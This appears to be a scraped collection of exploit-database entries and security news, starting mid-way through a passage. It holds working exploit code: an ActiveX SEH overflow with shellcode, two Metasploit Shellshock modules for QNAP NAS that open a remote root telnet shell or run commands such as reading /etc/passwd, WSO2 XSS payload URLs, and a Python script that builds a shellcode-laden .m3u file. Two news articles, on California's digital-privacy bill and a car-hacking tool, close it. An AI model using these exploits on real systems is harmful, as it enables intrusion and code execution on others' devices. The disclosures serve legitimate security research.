"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for(i=0;i<(4000-(arg1.length + seh.length + nseh.length + nops.length+ sc.length));i++) { buff += "A"; } // [junk buffer][next SEH(jump)][SE Handler (pop pop ret)][Shellcode] fbuff = arg1 + nseh + seh + nops + sc + buff; target.LoadImage(fbuff); </script> </html> Source

# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] # Employer homepage: http://www.securegroup.it # Vendor homepage: http://www.qnap.com # Version: All Turbo NAS models except TS-100, TS-101, TS-200 # Tested on: TS-1279U-RP # CVE : 2014-6271 # Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61 ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/d3vpp/metasploit-modules ## require 'msf/core' require 'net/telnet' class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::CommandShell def initialize(info = {}) super(update_info(info, 'Name' => 'QNAP admin shell via Bash Environment Variable Code Injection', 'Description' => %q{ This module allows you to spawn a remote admin shell (utelnetd) on a QNAP device via Bash Environment Variable Code Injection. Affected products: All Turbo NAS models except TS-100, TS-101, TS-200 }, 'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-6271'], #aka ShellShock ['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61'] ], 'Platform' => ['unix'] )) register_options([ OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']), OptPort.new('LTELNET', [true, 'Set the remote port where the utelnetd service will be listening','9993']) ], self.class) end def check begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; echo; /usr/bin/id" }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE vprint_error("Connection failed") return Exploit::CheckCode::Unknown end if !res return Exploit::CheckCode::Unknown elsif res.code== 302 and res.body.include? 'uid' return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit_telnet() telnetport = datastore['LTELNET'] print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}") print_status("#{rhost}:#{rport} - Sending exploit") begin sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) if sock print_good("#{rhost}:#{rport} - Backdoor service spawned") add_socket(sock) else fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not spawned") end print_status "Starting a Telnet session #{rhost}:#{telnetport}" merge_me = { 'USERPASS_FILE' => nil, 'USER_FILE' => nil, 'PASS_FILE' => nil, 'USERNAME' => nil, 'PASSWORD' => nil } start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) rescue fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not handled") end return end def run begin telnetport = datastore['LTELNET'] res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; /bin/utelnetd -l/bin/sh -p#{telnetport} &" }) rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable => e fail_with(Failure::Unreachable, e) ensure disconnect end exploit_telnet() end end Source

# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] # Employer homepage: http://www.securegroup.it # Vendor homepage: http://www.qnap.com # Version: All Turbo NAS models except TS-100, TS-101, TS-200 # Tested on: TS-1279U-RP # CVE : 2014-6271 # Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61 ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/d3vpp/metasploit-modules ## require 'msf/core' class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection', 'Description' => %q{ This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system. Affected products: All Turbo NAS models except TS-100, TS-101, TS-200 }, 'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-6271'], #aka ShellShock ['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61'] ], 'Platform' => ['unix'] )) register_options([ OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']), OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd']) ], self.class) end def check begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; echo; /usr/bin/id" }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE vprint_error("Connection failed") return Exploit::CheckCode::Unknown end if !res return Exploit::CheckCode::Unknown elsif res.code== 302 and res.body.include? 'uid' return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def run res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; echo; #{datastore['CMD']}" }) if res.body.empty? print_error("No data found.") elsif res.code== 302 print_status("#{rhost}:#{rport} - bash env variable injected") puts " " print_line(res.body) end end end Source

Hi, WSO2 Identity Server (http://wso2.com/products/identity-server/) version 4.5.0/4.6.0/5.0.0 is prone to multiple vulnerabilities, including authentication bypass. Timeline: 09.10.2014 - Vendor notified 22.11.2014 - Vendor confirmed 04.12.2014 - Patches released 25.03.2015 - Bugtraq disclosure Vulnerable versions: IS 4.5.0 IS 4.6.0 IS 5.0.0 Fixed versions: IS 4.5.0 + WSO2-CARBON-PATCH-4.2.0-0932 IS 4.6.0 + WSO2-CARBON-PATCH-4.2.0-0933 IS 5.0.0 + WSO2-CARBON-PATCH-4.2.0-0930 IS 5.0.0 + Service Pack 1 Vulnerabilities details: 1) Identity spoofing/authentication bypass. Attacker need to log in to WSO2 IS to obtain valid HTTP session. Given this session he/she can request OpenID assertion from WSO2 IS to _any_ identity (openid.identity). Thus any authenticated user is able to spoof any identity he/she requests, in order to login to RP as user of his/her will. 2) XSS A - HTML injection https://<wso2is_address>/openid/%3cIMG%20SRC%3d%22a%22%20onerror=alert(%22XSS%22)%3e 3) XSS B - HTML injection https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=http://example.com&openid.realm=http://example.com&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.identity=https://example.com/test&openid.claimed_id=https://example.com/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49bf-8bb2-7b6a1e%27%2f%3e%3c%73%63%72%69%70%74%3eeval("ale"%2b"rt(1)")%3c%2f%73%63%72%69%70%74%3e&type=openid&commonAuthCallerPath=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:LOCAL 4) XSS C - JavaScript injection https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=http://example.com&openid.realm=http://example.com&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.identity=https://example.com/test&openid.claimed_id=https://example.com/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49bf-8bb2-7b6a1e-aaa"%0a};alert(1);%0aif(0){"&type=openid&commonAuthCallerPath=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:LOCAL regards -- Bartlomiej Balcerek WCSS CSIRT Wroclaw Centre for Networking and Supercomputing Wroclaw University of Technology, Poland phone: +48 (71) 320-20-79 mail: bartol@pwr.edu.pl Source

#!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Mini-sream Ripper v2.7.7.100 Local Buffer Overflow #[+] Date: 25-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/43/Mini-streamRipper.exe?token=1427334864_8d9c5d7d948871f54ae14ed9304d1ddf&fileName=Mini-streamRipper.exe #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Original POC: # http://www.exploit-db.com/exploits/11197/ #POC: #IMG1: #http://i.imgur.com/ifXYgwx.png #IMG2: #http://i.imgur.com/ZMisj6R.png from struct import pack file="crack.m3u" junk="\x41"*35032 eip=pack('<I',0x7C9D30D7) junk2="\x44"*4 #Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore #http://www.exploit-db.com/exploits/28996/ shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74" "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe" "\x49\x0b\x31\xc0\x51\x50\xff\xd7") writeFile = open (file, "w") writeFile.write(junk+eip+junk2+shellcode) writeFile.close() Source

SACRAMENTO, Calif.—A California state bill that would require a warrant to access all kinds of digital data passed its first hurdle after being approved by the Senate Public Safety Committee on Tuesday. Among other sweeping new requirements to enhance digital privacy, the bill notably imposes a warrant requirement before police can access nearly any type of digital data produced by or contained within a device or service. In other words, that would include any use of a stingray, also known as a cell-site simulator, which can not only used to determine a phone’s location, but can also intercept calls and text messages. During the act of locating a phone, stingrays also sweep up information about nearby phones—not just the target phone. According to the bill's summary: If the California Electronic Communications Privacy Act (CalECPA) passes the California State Senate and the State Assembly, and is signed by the governor, it would mark a notable change for law enforcement in America’s most populous state. However, passage is not a sure thing. Previous versions of the bill were vetoed by the governor twice in 2012 and again in 2013. The bill was introduced in February 2015 by State Senator Mark Leno (D-San Francisco). Texas and other states already have similar laws on the books, while revision to the federal Electronic Communications Privacy Act (ECPA) has stalled for years. California law enforcement agencies, like others nationwide, have been cagey as to how stingray use is requested and carried out. Last week, the Anaheim Police Department published a version of a letter that had been prewritten by the FBI in a poor attempt to provide further disclosure about how they use the surveillance devices. Only one opposed In June 2014, the Supreme Court of the United States ruled unanimously in a case known as Riley v. California that law enforcement officials must obtain a warrant before searching the contents of an arrestee’s phone. Among other changes, the new bill would put the Golden State in compliance with that decision. The Senate Committee on Public Safety approved Senate Bill 178 (SB 178) by a vote of 6-1, with little discussion from the assembled senators. It faced just a modicum of opposition at this stage. "California residents use technology every day to connect, communicate, work and learn," Nicole Ozer, an attorney with the American Civil Liberties Union of California, testified from a prepared statement in favor of the bill. "Our state’s leading technology companies rely on consumer confidence in these services to help power the California economy. "But consumers are increasingly concerned about warrantless government access to their digital information, and for good reason. While technology has advanced exponentially, California privacy law has remained largely unchanged. Law enforcement is increasingly taking advantage of outdated privacy laws to turn mobile phones into tracking devices and to access e-mails, digital documents, and text messages without proper judicial oversight." In the pre-cellphone era, a "pen register and trap and trace order" allowed law enforcement to obtain someone's calling metadata in near real-time from the telephone company. Now, that same data can also be gathered directly by the cops themselves through the use of a stingray. In some cases, police have gone to judges asking for such a device or have falsely claimed the existence of a confidential informant while in fact deploying this particularly sweeping and invasive surveillance tool. Most judges are likely to sign off on a pen register application not fully understanding that police are actually asking for permission to use a stingray. Under federal law, pen registers are granted under a very low standard: authorities must simply show that the information obtained from the pen register is "relevant to an ongoing criminal investigation." That is a far lower standard than being forced to show probable cause for a search warrant or wiretap order. A wiretap requires law enforcement to not only specifically describe the alleged crimes but also to demonstrate that all other means of investigation had been exhausted or would fail if they were attempted. California doesn’t actually have a specific pen register statute—a pen/trap application template that Ars recently obtained from the Oakland Police Department under a public records request cites the federal statute. However, that practice goes against a 2003 opinion from the California Attorney General. The AG concluded that because California affords its citizens more privacy under the state constitution than does federal law, a state law enforcement officer cannot use a federal statute for a pen/trap order. Cops don’t like it After more testimony, the committee members heard from Marty Vranicar of the California District Attorneys Association (CDAA) and Aaron McGuire, a lobbyist for the California Sheriff's Association (CSA). Vranicar told the committee that the bill would "undermine efforts to find child exploitation," specifically child pornography. "SB 178 threatens law enforcement’s ability to conduct undercover child porn investigation. the so-called peer-to-peer investigations," he said. "Officers, after creating online profiles—these e-mails provide metadata that is the key to providing information. This would effectively end online undercover investigations in California." Ars was unable to obtain the letters filed by Vranicar and McGuire to the committee that more fully outlined their opposition. However, no other members of the public nor other groups spoke up in favor of the law enforcement position. By contrast, SB 178 has notable support from a number of established organizations and tech companies, including the Council on American Islamic Relations, the California Newspaper Publishers Association, Twitter, Facebook, Microsoft, and Google, among others. After Vranicar and McGuire spoke, they faced just one question from Sen. Joel Anderson (R-San Diego County), who said that he wanted to see revision suggested by the law enforcement establishment. "One of the issues that I have is that people's cellphones are being abused," he said, holding up his iPhone. "It's clear that that's happening. I think you need to figure out how to be part of that solution. "While you want to stop criminal behavior, it can't be at the price of liberty. If you have the right to break into my house, with a warrant and take my computer, that should be the standard for phones as well." The committee seemed unmoved by law enforcement concerns, and passed the bill handily. It now moves to the Senate Appropriations Committee before eventually going on to the entire state Senate. Source

THE AVERAGE AUTOMOBILE today isn’t necessarily secured against hackers, so much as obscured from them: Digitally controlling a car’s electronics remains an arcane, specialized skill among security researchers. But that’s changing fast. And soon, it could take as little as $60 and a laptop to begin messing around with a car’s digital innards. Tomorrow at the Black Hat Asia security conference in Singapore, 24-year-old Eric Evenchick plans to present a new device he calls the CANtact. The open source board, which he hopes to sell for between $60 and $100, connects on one end to a computer’s USB port, and on the other to a car or truck’s OBD2 port, a network port under its dashboard. That makes the CANtact a cheap interface between any PC and a vehicle’s controller area network or CAN bus, the collection of connected computers inside of every modern automobile that control everything from its windows to its brakes. With just that go-between gadget and the open source software that Evenchick is releasing for free, he hopes to make car hacking a far cheaper and more automated process for amateurs. “I realized that there were no good tools for me to play around with this stuff outside of what the auto industry uses, and those are incredibly expensive,” Evenchick says, referring to products sold by companies like Vector that can cost tens of thousands of dollars. “I wanted to build a tool I can get out there, along with software to show that this stuff isn’t terribly complicated.” Over the last several years, researchers have shown that car hacking represents a real security threat. In 2013, for instance, Darpa-funded security researchers Chris Valasek and Charlie Miller showed (with me as their chosen crash-test dummy) that it was possible to send digital commands from a laptop connected to a car’s CAN bus that affected steering, slammed on brakes, or even disabled brakes at some speeds. Evenchick’s gadget aims to make exactly that sort of testing more accessible to researchers. In their tests, Valasek and Miller used a $150 ECOM cable that they rewired by hand to connect to their test vehicles’ OBD2 ports. (Valasek says a stock cable capable of that connection would have cost $1,200.) Evenchick’s CANtact is designed to make that connection out of the box at a much lower cost. The average coder isn’t familiar with the protocol most cars’ computers rely on to communicate. But Evenchick has written open source software for CANtact that automates much of the manual work of CAN bus hacking. Like the earlier work by Valasek and Miller, the CANtact is designed to send commands in Unified Diagnostics Services, the CAN protocol that auto mechanics use to communicate with electronic control units (or ECUs) throughout a vehicle. That allows anyone to write python scripts that can automatically trigger commands in a car’s digital network that range from turning off its “check engine” light to automatically pumping its brakes. “Most people have no idea there’s all this diagnostic stuff that someone who’s connected to the CAN bus can use to do all these interesting things,” says Evenchick. “What are the extent of those features? And what implementation problems exist that could be big security holes?” For now, actually figuring out what a certain UDS command sent from the CANtact might do in a specific vehicle will largely be a matter of trial and error for amateur car hackers, says Evenchick. But by publishing its software on Github, he hopes the code will become a collection of different hackers’ techniques that target individual vehicle makes and models. “It would be awesome if people messing around with their cars… could work together to build a library [of code] to do all this stuff,” says Evenchick. “You’re a Honda owner, and someone else is a Honda owner. If they find some cool things to do and you want to play around with it too, they can share it.” The CANtact, of course, can only test security exploits that require physical access, not remote attacks. But the device does help to automate the testing of security exploits that would be possible once a hacker has already gained a wireless foothold on a car’s network. And the notion of a hacker gaining that sort of initial wireless foothold in a car’s network is more than theoretical. Researchers at the University of Washington and the University of California at San Diego demonstrated in 2011 that they could gain access to an unnamed car’s network through wireless attacks that included a Bluetooth connection, the car’s OnStar-like cellular radio, and even Android malware on the driver’s phone. Evenchick says his CANtact gadget isn’t intended to make any sort of malicious car hacking easier. Instead, he argues, it’s meant to foster hobbyist car hacking and security research that can expose and help fix real vulnerabilities in the digital components of cars and trucks. Miller and Valasek’s earlier research, for example, served as a public demonstration that cars’ internal networks lack basic security protections. Their work led to Senator Edward Markey sending a series of questions to 20 automakers that eventually revealed widespread inattention to security and in some cases a potential lack of anti-hacking measures in their cars and trucks. Only seven of the companies said they used third party security auditing for their vehicles, and only two said they currently had features to respond to a hacker intrusion on their vehicles’ CAN buses. The more attention and testing those car systems receive, Evenchick says, the more secure they’ll eventually become. “You don’t really own a device until you can open it up and tear it apart,” says Evenchick. “Your car is more connected than ever before. Just having people know what’s going on with cars and understand them better would be kind of nice.” Source